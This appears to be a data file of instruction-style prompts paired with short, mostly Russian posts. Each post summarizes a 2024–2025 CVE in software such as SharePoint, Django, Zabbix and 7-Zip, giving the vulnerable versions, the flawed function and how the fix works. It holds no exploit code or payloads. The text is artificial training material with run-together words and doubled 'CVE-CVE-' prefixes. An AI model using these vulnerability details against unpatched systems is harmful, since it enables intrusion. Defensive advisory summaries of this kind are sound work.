| Write a post on the following topic,Уязвимость Remote Code Execution в Microsoft SharePoint 2019,"CVE-CVE-2024-38094 , обнаруженная вMicrosoft SharePoint 2019 в версиях до 16.0.10412.20001приводит кRemote Code Execution (RCE). Проблема заключалась в возможности аутентифицированного злоумышленника с правамиSite Ownerвнедрить и выполнить произвольный код, используя недостаток десериализации данных на конечной точке APIvti_bin/client.svc/ProcessQuery. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Уязвимость SQL Injection в devtron до версии 0.7.1,"CVE-CVE-2024-45794 , выявленная вdevtron в версиях до 0.7.1, приводит кSQL Injection. Уязвимость обусловлена попаданием пользовательских данных через параметрaccessTypeнапрямую в SQL запрос при обращении к CreateUser API/orchestrator/user(см.source code). Висправленииформирование SQL запроса стало выполняться с помощью параметризации." |
| Write a post on the following topic,CRLF Injection vulnerability in Refit before version 8.0.0,"CVE-CVE-2024-51501 , обнаруженная вRefit в версиях до 8.0.0, приводит кCRLF Injection. Проблема заключалась в применении функцииTryAddWithoutValidation(), которая не исключает символыCRLFпри добавлении новых заголовков в HTTP запросы (см.source code). Висправленииперед добавлением заголовка, его значения стали пропускаться через методEnsureSafe(), который используется для очистки передаваемых значений от символовCRLF." |
| Write a post on the following topic,CVE-2024-49770: Path Traversal Vulnerability in Oak,"CVE-CVE-2024-49770 , выявленная вoak в версиях до 17.1.2, приводит кPath Traversal. Уязвимость обусловлена использованиемdecodeComponent()для обработки путей (см.source code), что позволяло злоумышленнику обойти проверку и получить доступ к произвольным файлам на хосте. Висправлениифункция была заменена на встроенную функциюdecode()для декодирования путей к файлам." |
| Write a post on the following topic,Cross-Site Scripting (XSS) vulnerability in Password Pusher Application,"CVE-CVE-2024-51989 , обнаруженная вPassword Pusher Application в версиях с 1.41.1 до 1.48.0, приводит кCross-Site Scripting (XSS). Проблема заключалась в попадании внешних данных через параметрconfirmation_tokenв состав html-кода (см.source code), что позволяет злоумышленнику внедрить вредоносный JavaScript код. Висправлениибыла добавлена функция экранированияh()параметраconfirmation_tokenпри его добавлении в html-код." |
| Write a post on the following topic,Path Traversal уязвимость в Learning Management System for WordPress,"CVE-CVE-2024-10470 , обнаруженная вLearning Management System for WordPress в версиях до 4.963, приводит кPath Traversal. Проблема заключалась в возможности злоумышленника читать и удалять произвольные файлы, используя недостатки в проверках путей к файлу и разрешений в функцияхreadfile()иunlink(). Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Path Traversal vulnerability in CraftCMS versions 4.0.0-RC1 to 4.12.1,"CVE-CVE-2024-52293 , обнаруженная вCraftCMS в версиях с 4.0.0-RC1 до 4.12.1, приводит кPath Traversal. Проблема заключалась в возможности формирования пути к файлу на основе пользовательских данных без их фильтрации (см.source code), что позволяло злоумышленнику разместить шаблон в системной директории. Висправлениирезультирующее значении пути, возвращаемое функциейabsolutePath(), пропускается через фильтрующий методstatic::normalizePath()." |
| Write a post on the following topic,Cross-Site Scripting (XSS) уязвимость в lollms-webui,"CVE-CVE-2024-5125 , выявленная вlollms-webui в версиях до 9.8, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена попаданием пользовательских файлов SVG в функциюexecute_svg()(см.source code), что позволяло злоумышленнику внедрить в такие файлы произвольный JavaScript код, который в последующем выполнится. Висправлениибыла добавлена функцияsanitize_svg(), которая удаляет элементыscriptи элементы с атрибутами, начинающимися сon, в загружаемых SVG файлах." |
| Write a post on the following topic,Path Traversal Vulnerability in Kanboard,"CVE-CVE-2024-51747 , обнаруженная вkanboard в версиях до 1.2.41, приводит кPath Traversal. Проблема заключалась в попадании пользовательских данных без обработки в функции взаимодействия с файлами классаFileStorage(см.source code), что позволяло злоумышленнику читать и удалять произвольные файлы в файловой системе. Висправлениив конструкторе добавили проверки для инициализации базового каталога$baseDir, а также был добавлен методgetRealFilePath()для контроля пути к файлу." |
| Write a post on the following topic,OS Command Injection Vulnerability in Zoraxy,"CVE-CVE-2024-52010 , выявленная вzoraxy в версиях с 2.6.1 по 3.1.2, приводит кOS Command Injection. Уязвимость обусловлена использованием значений из параметраusernameв функцииexec.Command()(см.source code), что позволяло злоумышленнику при конфигурации подключения через веб-интерфейс внедрить произвольные команды ОС и выполнить их. Висправлениибыл добавлен методValidateUsernameAndRemoteAddr()для контроля значенийusernameиremoteIpAddrс помощью набора регулярных выражений." |
| Write a post on the following topic,Уязвимость CVE-2024-10979 в PostgreSQL PL/Perl,"CVE-CVE-2024-10979 , обнаруженная вPostgreSQL PL/Perl в версиях до 17.1приводит кBroken Access Control. Проблема заключалась в возможности непривилегированного пользователя СУБД изменять значения переменных среды процесса, что в дальнейшем позволяло ему выполнить произвольный код. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory. Информация об эксплуатации данной уязвимости есть встатье от RedRays" |
| Write a post on the following topic,CVE-CVE-2024-52803 приводит к OS Command Injection в llamafactory.,"CVE-CVE-2024-52803 , обнаруженная вllamafactory в версиях до 0.9.1, приводит кOS Command Injection. Проблема заключалась в попадании пользовательских данных в функциюPopen()с флагомshell=True(см.source code), что позволяло внедрить произвольные команды ОС и выполнить их. Висправлениифлагshell=Trueв функцииPopen()был удален, также метод формирования аргумента процесса был заменен на использование листа, а не форматированной строки." |
| Write a post on the following topic,Уязвимость HTTP Request Smuggling в aiohttp,"CVE-CVE-2024-52304 , выявленная вaiohttp в версиях до 3.10.11, приводит кHTTP Request Smuggling. Уязвимость обусловлена отсутствием обработки символа перевода строки""\n""при парсинге http-запросов (см.source code), что позволяло злоумышленнику, например, получить доступ к конфиденциальной информации. Висправлениибыло добавлено условие для проверки наличия символов""\n""." |
| Write a post on the following topic,Cross-Site Scripting (XSS) vulnerability in 2FAuth due to insecure SVG file handling,"CVE-CVE-2024-52597 , обнаруженнаяв 2FAuth в версиях до 5.4.1, приводит кCross-Site Scripting (XSS). Проблема заключалась в отсутствии безопасной обработки загружаемых файлов типа SVG (см.source code), что позволяло внедрять произвольныйJavaScriptкод внутрь файла, который будет выполнен при обращении к нему. Висправлениибыла добавлена библиотекаenshrined\svgSanitizeдля санитизации загружаемыхsvgфайлов." |
| Write a post on the following topic,Уязвимость XML External Entity (XXE) в PhpSpreadsheet,"CVE-CVE-2024-48917 , выявленнаявphpspreadsheet в версиях до 1.29.4, приводит кXML External Entity (XXE). Уязвимость обусловлена небезопасным использованием регулярных выражений в методеfindCharSet()для определения значения поляencoding(см.source code), что позволяло злоумышленнику обойти механизмы валидации и, например, внедрять произвольные сущности в передаваемом XML. Висправленииразработчики отказались от использования регулярных выражений и стали вызывать методguessEncodingBom()для определения значения поля encoding, также была добавлена санитизация значений\0с помощьюstr_replace()." |
| Write a post on the following topic,Authentication Bypass in Really Simple Security Plugin for WordPress,"CVE-CVE-2024-10924 , обнаруженная в плагинеReally Simple Security для Word Press в версиях с 9.0.0 до 9.1.1, что приводит кAuthentication Bypass. Проблема заключалась в возможности неаутентифицированного злоумышленника войти под учетной записью любого пользователя, включая администратора, из-за неправильной обработки ошибок проверки пользователя при взаимодействииREST APIс функциейcheck_login_and_get_user(). Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,CVE-2024-51058: Local File Inclusion vulnerability in tcpdf versions up to 6.7.5,"CVE-CVE-2024-51058 , обнаруженная вtcpdf в версиях до 6.7.5, приводит кLocal File Inclusion (LFI). Проблема заключалась в возможности через атрибутаsrcтэга<img>выполнить выход из каталога (см.source code), что позволяло злоумышленнику получить доступ к произвольным файлам на хосте. Висправлениибыло добавлена условие для проверки содержания подстроки../в переменной$imgsrcс помощьюstr_contains()." |
| Write a post on the following topic,SSRF уязвимость в lobe-chat,"CVE-CVE-2024-32965 , выявленная вlobe-chat в версиях до 1.19.13, приводит кServer-Side Request Forgery (SSRF). Уязвимость обусловлена возможностью обхода механизмов валидации получаемых адресов с помощью определенных доменных имен, например, как127.0.0.1.xip.io(см.source code), что позволяло злоумышленнику осуществить подделку запросов и получить доступ, например, к хостам в внутренней сети. Висправлениииспользуемые механизмы проверки получаемого адреса на принадлежность к адресам внутренней сети были заменены на использование методаuseAgentиз библиотекиrequest-filtering-agent." |
| Write a post on the following topic,Уязвимость Path Traversal в Kubernetes kubelet,"CVE-CVE-2024-10220 , выявленная вKubernetes kubelet в версиях до 1.28.12, приводит кPath Traversal. Уязвимость обусловлена отсутствием ограничения уровня вложенности каталогов при создании томаgitRepo(см.source code), что позволяло пользователю, имеющему возможность создатьpodи связать томgitRepo, выполнять произвольные команды за пределами границ контейнера. Висправлениизначениеsrc.Directoryпропускается через фильтрующую функциюfilepath.Clean()и контролируется на наличие символов""/""и""\\""." |
| Write a post on the following topic,"Проблема ""Prototype Pollution"" в библиотеке intlify/shared.","CVE-CVE-2024-52810 , обнаруженная вintlify/shared в версиях с 9.7.0 по 10.0.4, приводит кPrototype Pollution. Проблема заключалась в отсутствии контроля за свойством""__proto__""при копировании объектов с помощью функцииdeepcopy()(см.source code), что позволяло злоумышленнику загрязнить прототип. Висправлениив исправлении было добавлено условие, которое позволяет отслеживать появление свойства""__proto__""при обработке." |
| Write a post on the following topic,SQL-инъекция в Zabbix (CVE-2024-42327),"CVE-CVE-2024-42327 , обнаруженная вZabbix в версиях с 6.0.0 до 6.0.31, приводит кSQL-Injection. Проблема заключалась в возможности пользователя без прав администратора внедрить произвольный SQL-код и выполнить его, используя общедоступный эндпоинт APIuser.get. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,SSRF vulnerability in Mobile Security Framework,"CVE-CVE-2024-54000 , обнаруженная вMobile Security Framework в версиях до 3.9.7, приводит кServer-Side Request Forgery (SSRF). Проблема заключалась в функции_check_url(), которая используется для проверки URL-адресов, и использованием опцииallow_redirectsсо значениемTrueв функцииrequests.get()(см.source code). Такая реализация позволяет злоумышленнику использовать редиректы для доступа к внутренним эндпоинтам приложения. Висправлениизначение опцииallow_redirectsбыло заменено наFalse, также был добавлен дополнительный контроль кода ответа302после запроса." |
| Write a post on the following topic,Race Conditions в moby до версии 26.0.0,"CVE-CVE-2024-36623 , обнаруженная вmoby в версиях до 26.0.0, приводит кRace Conditions. Проблема заключалась в возможности доступа нескольких потоков к ресурсам в процессе операций записи (см.source code), что могло привести к повреждению, хранящихся данных приложения, или к отказу в обслуживании. Висправлениибыло добавлено взаимное исключение с помощью мьютексовmu.Lock()иmu.Unlock()." |
| Write a post on the following topic,SQL-Injection уязвимость в Django,"CVE-CVE-2024-53908 , выявленная вDjango в версиях до 5.1.4, с 5.0 до 5.0.10 и с 4.2 до 4.2.17, приводит кSQL-Injection. Уязвимость обусловлена попаданием пользовательских данных напрямую в SQL запросах через параметрlhs(см.source code), что позволяло злоумышленнику внедрить произвольный SQL код. Висправленииформирование SQL запроса стало выполняться с помощью параметризации, также была добавлена валидация входных параметров." |
| Write a post on the following topic,NoSQL-Injection в mongoose из-за использования оператора $where,"CVE-CVE-2024-53900 , выявленная вmongoose с 8.0.0-rc0 по 8.8.3, приводит кNoSQL-Injection. Уязвимость обусловлена отсутствием ограничений использования оператора$whereдля фильтрации при использовании функцииpopulate()(см.source code), что позволяло злоумышленнику внедрить произвольный JavaScript код через запрос. Висправлениибыло добавлено ограничение на использование оператора$whereс функциейpopulate()." |
| Write a post on the following topic,Local File Inclusion vulnerability in WordPress WP Umbrella plugin,"CVE-CVE-2024-12209 , обнаруженная вплагине WordPress WP Umbrella в версиях до 2.17.1,приводит кLocal File Inclusion (LFI). Проблема заключалась в возможности неавторизованным злоумышленника получить доступ к произвольным файлам на хосте через параметрfilenameпри использованииactionumbrella-restore. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Local File Inclusion vulnerability in Browsershot,"CVE-CVE-2024-21544 , обнаруженная вBrowsershot в версиях до 5.0.1, приводит кLocal File Inclusion. Проблема заключалась в обработке пользовательских данных в функцииsetUrl()без учета наличия специальных символов (см.source code), что позволяло обойти механизм безопасности и получить доступ к произвольным файлам на хосте. Висправленииперед проверкой была добавлена обработка пользовательского значения с помощью функцииtrim(), которая позволяет убрать специальные символы." |
| Write a post on the following topic,Уязвимость XXE в http4k,"CVE-CVE-2024-55875 , выявленная вhttp4k в версиях до5.40.0.0, приводит кXML External Entity (XXE). Уязвимость обусловлена небезопасной конфигурацией обработчика XML (см.source code), что позволяло злоумышленнику внедрить произвольные сущности в обрабатываемый документ. Висправлениибыла добавлена конфигурация XML обработчика, в частностиXMLConstants.ACCESS_EXTERNAL_DTDиXMLConstants.ACCESS_EXTERNAL_SCHEMAс значениемFalse." |
| Write a post on the following topic,Уязвимость Missing Authorization в плагине WPForms для WordPress,"CVE-CVE-2024-11205 , выявленная в плагинеWPForms для WordPressс версии 1.8.4 по1.9.2.1включительно, приводит кMissing Authorization. Уязвимость заключается в отсутствии контроля прав пользователей в функцияхajax_single_payment_refund()иajax_single_payment_cancel()(см.source code), что позволяло злоумышленнику выполнять привилегированные действия с платежами. Висправлениидобавлены проверки прав доступа для текущего пользователя c помощью функцииwpforms_current_user_can()." |
| Write a post on the following topic,Path Traversal уязвимость в luigi до версии 3.6.0,"CVE-CVE-2024-21542 , обнаруженная вluigi в версиях до 3.6.0, приводит кPath Traversal. Проблема заключалась в небезопасной обработке содержимого пользовательских архивов во время распаковки в функции_extract_packages_archive()(см.source code), что позволяло злоумышленнику, например, перезаписать произвольные файлы на хосте и добиться удаленного выполнения кода. Висправленииметод распаковки архивов был заменен на использование классаSafeExtractor, который содержит методы для безопасной обработки содержимого." |
| Write a post on the following topic,Vulnerability in Apache Struts allowing unrestricted file upload,"CVE-CVE-2024-53677 , обнаруженная вApache Struts в версиях с 2.0.0 до 6.4.0приводит кUnrestricted Upload of File with Dangerous Type. Проблема заключалась в возможности злоумышленника манипулировать параметрами при загрузке файлов, чтобы включить обход директорий и добиться, например, перезаписи произвольных файлов или удаленного выполнения кода. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Local File Inclusion vulnerability in Uptime Kuma,"CVE-CVE-2024-56331 , обнаруженная вUptime Kuma в версиях до 1.23.16, приводит кLocal File Inclusion (LFI). Уязвимость заключается в возможности доступа к файлам, используя протоколfile:///, в функцииcheck()классаRealBrowserMonitorType(см.source code), что позволяло злоумышленнику получить доступ к конфиденциальным локальным файлам на сервере. Висправлениибыла добавлена проверка в составе URL разрешенных протоколов (толькоhttpиhttps) ." |
| Write a post on the following topic,SQL Injection vulnerability in DataEase,"CVE-CVE-2024-55953 , обнаруженная вDataEase в версиях до 1.18.27, приводит кSQL Injection. Уязвимость обусловлена попаданием пользовательских данных в функциюgetJdbc()без фильтрации (см.source code), что позволяло аутентифицированным пользователям читать и десериализовать произвольные файлы через соединениеJDBC. Висправлениипроверка параметров была заменена на проверку всей итоговой строки, которая используется для подключения." |
| Write a post on the following topic,Remote Code Execution vulnerability in CMS Craft,"CVE-CVE-2024-56145 , обнаруженная вCMS Craft в версиях до 3.9.14, 4.13.2 или 5.5.2, приводит кRemote Code Execution (RCE). Проблема заключалась управлении источниками конфигурационных параметров (см.source code), что давало возможность осуществлять удаленное выполнение кода, эксплуатируя параметр конфигурации PHPregister_argc_argv(включен по умолчанию). Висправлении, в функцииfindConfig()была изменена логика получения конфигурационных данных - в консольных приложениях теперь данные берутся из командной строки, а в других случаях из переменной окружения." |
| Write a post on the following topic,Vulnerability in Spring Framework leading to Path Traversal,"CVE-CVE-2024-38819 , обнаруженная вSpring-framework в версиях с 6.1.0 до 6.1.13, приводят кPath Traversal. Проблема заключалась в возможности выхода за пределы каталога через закодированные символы../в URL (см.source code), что позволяло злоумышленнику получить доступ к произвольным данным на хосте. Висправлениибыла скорректирована функцияnormalizePath(), которая перед проверкой наличия символов../дважды декодирует URL при наличии спецсимволов'%'с помощью функцииdecode()." |
| Write a post on the following topic,Уязвимость Remote Code Execution в Databricks JDBC Driver,"CVE-CVE-2024-49194 , обнаруженная вDatabricks JDBC Driver в версиях до 2.6.40, приводит кRemote Code Execution (RCE). Уязвимость возникает из-за неправильной обработки параметраkrbJAASFileв драйвере, что позволяет злоумышленнику использовать этот параметр в URL для эксплуатации инъекции JNDI. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,SQL Injection Vulnerability in Chatwoot,"CVE-CVE-2025-21628 , обнаруженная вChatwoot в версиях до 3.16.0, приводит кSQL Injection. Уязвимость заключалась в попадании пользовательских конструкции SQL вquery_operatorиз составаconditionв методеperform()(см.source code), что давало возможность внедрения произвольного SQL кода любому аутентифицированному пользователю. Висправлениидобавлена функцияvalid_query_operator(), которая проверяет, чтоquery_operatorможет принимать только значенияANDилиOR." |
| Write a post on the following topic,"Уязвимость ""Arbitrary File Deletion"" в SiYuan","CVE-CVE-2025-21609 , выявленная вSiYuan в версиях до 3.1.19, приводит кArbitrary File Deletion. Уязвимость обусловлена попаданием пользовательских путей к файлам в функциюParseJSONWithoutFix()через эндпоинт/api/history/getDocHistoryContent, в случае ошибки которой файл удаляется (см.source code), что давало возможность удаления произвольных файлов на хосте. Висправлениибыла добавлена проверка, что переданный путь находится в пределах рабочей области приложения, также была убрана функциональная возможность удаления файлов с помощьюos.RemoveAll()." |
| Write a post on the following topic,Server-Side Request Forgery (SSRF) vulnerability in Firecrawl versions up to 1.1.1,"CVE-CVE-2024-56800 , обнаруженная вFirecrawl в версиях до 1.1.1, приводит кServer-Side Request Forgery (SSRF).Уязвимость возникала из-за обработки получаемых значений IP-адресов в функцииscrapeURLWithFetch()без ограничений (см.source code), что приводило к возможности получить доступ к адресам из локальной сети.Висправлениибыла добавлена функцияmakeSecureDispatcher(), которая содержит проверки получаемых значений к локальным или зарезервированным адресам." |
| Write a post on the following topic,Уязвимость типа Open Redirect в Better Auth,"CVE-CVE-2024-56734 , обнаруженная вBetter Auth в версиях до v1.1.6, приводит кOpen Redirect. Уязвимость обусловлена возможностью внедрения значений URL-адресов в функциюcreateAuthMiddleware()через параметрcallbackURLэндпойнта/auth/verify-emailдля http-запросов кроме POST (см.source code). Висправлениибыла скорректирована функцияoriginCheckMiddleware()путем расширения набора методов http-запроса, что позволило обрабатывать значения параметраcallbackURLдля всех входящих http-запросов." |
| Write a post on the following topic,OS Command Injection уязвимость в Aviatrix Controller,"CVE-CVE-2024-50603 , обнаруженная вAviatrix Controller в версиях до 7.1.4191 и 7.2.4996, приводит кOS Command Injection.Проблема заключалась в неправильной фильтрации спецсимволов в параметрахcloud_typeиsrc_cloud_typeпри совершении действийlist_flightpath_destination_instancesиflightpath_connection_test, что позволяло неаутентифицированным пользователям удаленно выполнять произвольный код. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,SSRF уязвимость в Invoice Ninja,"CVE-CVE-2025-0474 , обнаруженная вInvoice Ninja в версиях с 5.8.56 по 5.11.23, приводит кServer-Side Request Forgery (SSRF). Уязвимость обусловлена попаданием пользовательских значений в атрибуты при формировании HTML (см.source code), что приводило к возможности пользователю читать произвольные файлы и отправлять сетевые запросы. Висправлениидобавлена функцияcleanHtml(), которая проверяет содержимое атрибутов, удаляет атрибуты содержащие URL." |
| Write a post on the following topic,"Уязвимость в Craft CMS, приводящая к удалённому выполнению кода (RCE)","CVE-CVE-2025-23209 , обнаруженная вCMS Craft в версиях до 5.5.8 и 4.13.8, приводит кRemote Code Execution (RCE). Уязвимость обусловлена попаданием пользовательских значений путей к файлу для восстановления базы данных из резервной копии в методactionRestoreDb()(см.source code), что приводило к попаданию произвольного кода в функцию_executeDatabaseShellCommand()и его выполнению. Висправлениипоявилась валидация пути к резервной копии БД с помощьюFileHelper, направленная на проверку существования файла и его нахождения в разрешенной директории." |
| Write a post on the following topic,Уязвимость CRLF Injection в Git LFS,"CVE-CVE-2024-53263 , выявленная вGit LFS в версиях до 3.6.1, приводит кCRLF Injection. Уязвимость обусловлена отсутствием проверки пользовательского ввода на содержание в нем символовCRLFв функцииbuffer()для командыgit-credential(см.source code), что позволяло злоумышленнику получить доступ к учетным данным других пользователей. Висправлениидобавлена проверка на наличие переносов строки(\n)в передаваемых данных и если такой символ найден, возвращается ошибка." |
| Write a post on the following topic,CVE-2025-23207: Cross-Site Scripting (XSS) vulnerability in KaTeX.,"CVE-CVE-2025-23207 , выявленная вKaTeX в версиях до 0.16.21, приводит кCross-Site Scripting (XSS). Проблема заключалась в попадании пользовательских данных без ограничений в состав команды\htmlData, которая используется для добавления атрибутов данныхdata-*к HTML-элементу (см.source code) , что могло привести к выполнению произвольного JavaScript-кода или генерации недопустимого HTML. Висправлениибыла добавлена проверка на наличие недопустимых символов в атрибуте." |
| Write a post on the following topic,SSRF vulnerability in W3 Total Cache plugin for WordPress,"CVE-CVE-2024-12365 , обнаруженная в плагинеW3 Total Cache для WordPress в версиях до 2.8.1включительно, приводит кServer-Side Request Forgery (SSRF). Проблема заключалась в отсутствии проверки авторизации в функцииis_w3tc_admin_page(), что позволяло аутентифицированным пользователям получить доступ к конфиденциальным данным и выполнять несанкционированные действия, внутри системы. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Path Traversal уязвимость в YesWiki,"CVE-CVE-2025-24019 , обнаруженная вYesWiki в версиях до 4.4.5 включительно, приводит кPath Traversal. Проблема заключалась в использовании параметров из запроса для формирования пути к файлу в методеfmErase()(см.source code), что позволяло злоумышленнику получить доступ к произвольным файлам на хосте. Висправлениидобавлена проверка формата имени файла и конструкцияbasename(realpath()), которая преобразует переданные данные в нормализованный абсолютный путь и извлекает только имя файла из пути, отбрасывая любые попытки указать директорию." |
| Write a post on the following topic,CVE-2025-24530: XSS vulnerability in phpMyAdmin versions up to 5.2.2,"CVE-CVE-2025-24530 , обнаруженная вphpMyAdmin в версиях до 5.2.2, приводит кCross-Site Scripting (XSS). Проблема заключалась в попадании пользовательских данных из имени таблицы в переменную$indexesProblemsв функцииgetIndexesProblems()без обработки (см.source code), что могло привести к генерации недопустимого HTML и выполнению произвольного JavaScript-кода. Висправлениибыла добавлена санитизация специальных символов с помощью функцииhtmlspecialchars()." |
| Write a post on the following topic,"Уязвимость Information Disclosure в Cilium, связанная с некорректной настройкой политики CORS.","CVE-CVE-2025-23047 , найденная вCilium в версиях до 1.14.18, 1.15.12 и 1.16.5, приводит кInformation Disclosure. Уязвимость возникала из-за некорректной настройки политики CORS (см.source code), что позволило злоумышленнику получить сведения о конфигурации кластераKubernetes. Висправлениибыла отключена поддержкаCORSи кросс-доменных запросов." |
| Write a post on the following topic,Remote Code Execution Vulnerability in ASTEVAL,"CVE-CVE-2025-24359 , обнаруженная вASTEVAL в версиях до 1.0.6, приводит кRemote Code Execution (RCE). Уязвимость обусловлена использованием в функцииon_formattedvalue()пользовательских данных вstr.format()без предварительной проверки (см.source code), что позволяет злоумышленнику манипулировать значением строки, используемой в опасном вызовеfmt.format(__fstring__=val). Висправлениидобавлены функцииgetattr()иsafe_format(), которые предотвращает доступ к небезопасным атрибутам объектов и убирают возможность выполнения небезопасного кода через подстановки." |
| Write a post on the following topic,Remote Code Execution vulnerability in 7-Zip versions up to 24.09.,"CVE-CVE-2025-0411 , обнаруженная в7-Zip в версиях до 24.09, приводит кRemote Code Execution (RCE). Уязвимость обусловлена некорректной обработкой архивов, на которые 7-Zip не распространяет маркировку безопасностиMark of the Webпри извлечении файлов, что позволяло злоумышленникам выполнять произвольный код в контексте пользователя. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Уязвимость Server-Side Template Injection в Tandoor Recipes,"CVE-CVE-2025-23211 , выявленная вTandoor Recipes в версиях до 1.5.24, приводит кServer-Side Template Injection (SSTI). Уязвимость обусловлена возможностью попадания пользовательского ввода в шаблонjinja2.Template()(см.source code), что может привести к выполнению произвольного кода на сервере. ВисправлениииспользованиеTemplate()было заменено на безопасную версиюSandboxedEnvironment(), который создает ограниченную среду для выполнения шаблонов." |
| Write a post on the following topic,Уязвимость OS Command Injection в Cacti до версии 1.2.29,"CVE-CVE-2025-22604 , выявленная вCacti в версиях до 1.2.29, приводит кOS Command Injection. Уязвимость обусловлена попаданием пользовательских данных в функциюshell_exec(), которая используется добавления данных в файл (см.source code). Висправленииопасная функция была заменена наfile_put_contents(), которая записывает пользовательские данные напрямую в файл." |
| Write a post on the following topic,"Уязвимость в Django-Unicorn, приводящая к модификации атрибутов объекта","CVE-CVE-2025-24370 , обнаруженная вDjango-Unicorn в версиях до 0.62.0, приводит кImproperly Controlled Modification of Dynamically-Determined Object Attributes.Уязвимость обусловлена возможностью внедрения магических методов Python в функциюset_property_value()(см.source code), что могло привести к произвольным изменениям состояния среды выполнения. Висправлениибыла добавлена проверка, что передаваемые параметры не начинаются и не заканчиваются нижними подчеркиваниями." |
| Write a post on the following topic,SQL Injection vulnerability in Snowflake versions 2.2.5 to 3.13.1,"CVE-CVE-2025-24793 , обнаруженная вSnowflake в версиях с 2.2.5 до 3.13.1, приводит кSQL Injection. Проблема заключалась в возможности использования пользовательских данных в SQL запросе (см.source code), что позволяло злоумышленнику внедрить произвольный SQL код. Висправленииформирование SQL запроса стало выполняться с помощью параметризации и было ведено ограничение, что в одном вызовеcursor.execute()должен быть выполнен только один SQL-запрос." |
| Write a post on the following topic,"Уязвимость Windows OLE, приводящая к Remote Code Execution (RCE)","CVE-CVE-2025-21298 , обнаруженная вWindows OLE, приводит кRemote Code Execution (RCE). Уязвимость находилась в функцииUtOlePresStmToContentsStm()вole32.dll, которая обрабатываетObject Linking and Embedding (OLE), встроенные в электронные письма/файлы в Microsoft Word и Outlook, что позволяло злоумышленнику встроить полезную нагрузку с вредоносным кодом в документы, который запускался при открытии или предварительном просмотре вредоносного документа. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Уязвимость OS Command Injection в SFTPGo до версии v2.6.5,"CVE-CVE-2025-24366 , обнаруженная вSFTPGo в версиях до v2.6.5, приводит кOS Command Injection. Уязвимость обусловлена передачей уязвимых параметров в командуrsync(см.source code), что давало удаленному пользователю возможность чтения и записи файлов с разрешениями серверного процессаSFTPGo. Висправлениибыла добавлена функцияcanAcceptRsyncArgs(), которая проверяет соответствие переданных аргументов заранее заданному формату для командыrsync." |
| Write a post on the following topic,"Уязвимость в cpp-httplib, приводящая к HTTP Request/Response Splitting","CVE-CVE-2025-0825 , выявленная вcpp-httplib в версиях c v0.17.3 до v0.18.3, приводит кHTTP Request/Response Splitting. Уязвимость обусловлена возможностью обхода проверки функцииhas_crlf(), которая проверяла только наличие символов\rи\n, но не учитывала кодировки и нулевые баты (см.source code), что позволяло злоумышленнику получить доступ к конфиденциальной информации. Висправлениибыла добавлена проверка символов по ""белому"" списку." |
| Write a post on the following topic,Уязвимость Path Traversal в S3Proxy,"CVE-CVE-2025-24961 , обнаруженная вS3Proxy в версиях до 2.6.0, приводит кPath Traversal. Уязвимость обусловлена добавлением пользовательского данных в путь до файла без предварительной проверки (см.source code), что приводило к возможности раскрытия списка локальных файлов пользователей. Висправлениибыла добавлена функцияcheckValidPath(), которая нормализует путь и проверяет, что путь начинается с разрешенной папки." |
| Write a post on the following topic,Cross-site Scripting (XSS) vulnerability in MDC versions up to 0.13.3,"CVE-CVE-2025-24981 , обнаруженная вMDC в версиях до 0.13.3, приводит кCross-site Scripting (XSS). Проблема заключалась в возможности обхода фильтрующей проверки, используя кодировку символов (см.source code), что позволяло злоумышленнику внедрить вредоносный JavaScript код. Висправлениибыла добавлена функцияisAnchorLinkAllowed(), которая декодирует переданное значение и санитизирует его от запрещенных комбинаций." |
| Write a post on the following topic,Deserialization of Untrusted Data in Trimble Cityworks,"CVE-CVE-2025-0994 , обнаруженная вTrimble Cityworks в версиях до 15.8.9 и в Cityworks в версиях до 23.10, приводит кDeserialization of Untrusted Data. Уязвимость позволяла аутентифицированному пользователю выполнить удаленное выполнение кода на веб-сервереMicrosoft Internet Information Services (IIS). Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,CVE-2025-24897: Cross-Site Request Forgery (CSRF) vulnerability in Misskey versions до 2025.2.0-alpha.0.,"CVE-CVE-2025-24897 , обнаруженная вMisskey в версиях до 2025.2.0-alpha.0, приводит кCross-Site Request Forgery (CSRF). Проблема заключалась в выдаче токена, который был доступен для всех страниц сайта и срок действия устанавливался равный году (см.source code), что приводило к возможности злоумышленником перехватить сессию пользователя и получить доступ к защищенным разделам приложения. Висправлениив функцииfetchAccount()для токена были установлены атрибуты cookie (path=/queue, max-age=86400, SameSite=Strict, Secure)." |
| Write a post on the following topic,Cross-Site Scripting (XSS) vulnerability in CtrlPanel,"CVE-CVE-2025-25203 , выявленная вCtrlPanel в версиях до 1.0, приводит кCross-Site Scripting (XSS). Проблема заключалась в передаче пользовательских значений в полеpriorityбез проверки (см.source code), что могло привести к выполнению вредоносных скриптов переданных через полеpriorityна странице модератора. Висправлениибыл добавлен ""белый"" список значений, которые может принимать полеpriority." |
| Write a post on the following topic,Уязвимость Resource Injection в KNOWAGE,"CVE-CVE-2024-57971 , обнаруженная вKNOWAGE в версиях до 8.1.30, приводит кResource Injection. Уязвимость заключалась в возможности злоумышленника передавать любые данные в идентификатор ресурсовJNDI(см.source code), что могло привести к несанкционированному доступу к системным ресурсам. Висправлениибыл добавлен методcheckJNDIName(), который проверяет, чтоJNDIимя начинается сjava:comp/env/jdbc/." |
